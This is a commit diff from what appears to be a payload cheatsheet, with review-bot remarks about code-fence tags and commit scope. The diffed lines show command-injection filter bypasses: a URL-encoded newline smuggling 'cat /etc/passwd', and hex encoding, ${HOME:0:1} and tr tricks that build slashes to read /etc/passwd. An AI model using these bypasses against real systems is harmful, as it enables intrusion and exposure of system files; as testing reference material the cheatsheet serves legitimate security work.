Bind shell cheatsheet (Fix #194)

Swissky
2020-05-24 14:09:46 +02:00
parent c734586e72
commit 4ca5e71c2f
10 changed files with 134 additions and 13 deletions

@@ -111,8 +111,9 @@ something%0Acat%20/etc/passwd
### Bypass characters filter via hex encoding
linux
```
Linux
```powershell
swissky@crashlab ~ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd
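Review bot: The fence under "Linux" is tagged `powershell`, but the block is a bash session (a `swissky@crashlab ~ $` prompt running `echo -e`). Tag it `bash` or `console` so the highlighter and the reader both treat it as the shell the label names. The capitalization fix from "linux" to "Linux" is fine.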
@@ -136,29 +137,22 @@ swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764)
swissky@crashlab ~ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash
```
### Bypass characters filter
Commands execution without backslash and slash - linux bash
```
```powershell
swissky@crashlab ~ $ echo ${HOME:0:1}
/
swissky@crashlab ~ $ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash
swissky@crashlab ~ $ echo . | tr '!-0' '"-1'
/
swissky@crashlab ~ $ tr '!-0' '"-1' <<< .
/
swissky@crashlab ~ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash
```
### Bypass Blacklisted words
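Review bot: These are formatting changes to the characters-filter section and have nothing to do with the commit subject "Bind shell cheatsheet (Fix #194)"; consider moving them to their own commit so the history for this file stays searchable. Within the hunk, the description line says "linux bash" while the fence directly below it is tagged `powershell`; use `bash` there. "Commands execution" should also read "Command execution".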